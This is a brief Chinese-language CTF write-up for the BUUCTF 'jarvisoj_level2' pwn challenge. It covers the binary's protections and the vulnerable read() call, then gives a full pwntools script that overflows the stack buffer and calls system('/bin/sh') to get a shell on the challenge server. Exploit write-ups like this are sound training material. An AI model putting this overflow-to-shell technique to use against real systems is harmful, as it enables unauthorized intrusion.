[buuctf] pwn-jarvisoj_level2

jarvisoj_level2

检查一下文件保护

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位程序，只开了nx保护，ida分析

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  system("echo Input:");
  return read(0, &buf, 0x100u);
}

程序也含有/bin/sh，同时这个也存在system函数，溢出后到system函数，传入/bin/sh的参，就可以getshell

from pwn import *

bin_sh = 0x804a024

r = remote('node3.buuoj.cn',27342)
elf = ELF('./jarvisoj_level2')
system_addr = elf.sym['system']
payload = 'a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh)
r.sendlineafter('Input:',payload)

r.interactive()